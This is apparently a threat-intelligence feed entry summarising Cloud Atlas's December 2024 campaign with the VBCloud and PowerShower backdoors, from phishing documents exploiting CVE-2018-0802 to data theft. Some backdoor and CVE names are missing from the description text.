216.73.217.80

Cloud Atlas using a new backdoor, VBCloud, to steal data

· Published 23/12/2024 13:25 · Modified 23/12/2024 15:16

Export JSON

Essential information

Published
23/12/2024 13:25
Modified
23/12/2024 15:16
Tags
2024-12-23 CVE-2018-0802 vbcloud vbshower
Related entities
1 vulnerabilities (cve), 16 observables, 1 intrusion sets (apt), 21 techniques (mitre), 3 malware, 7 others

Description

Cloud Atlas, a threat group active since 2014, has introduced a new backdoor called in its latest campaign targeting Eastern Europe and Central Asia. The attack chain begins with phishing emails containing malicious documents exploiting . The infection process involves downloading and executing an HTA file, which then deploys the backdoor. installs both and PowerShower backdoors. replicates previous capabilities, including downloading and executing malicious plugins, communicating with cloud servers, and performing various tasks. The campaign aims to steal data from victim devices, with collecting system information and exfiltrating files. PowerShower is used for network reconnaissance and further infiltration.

External references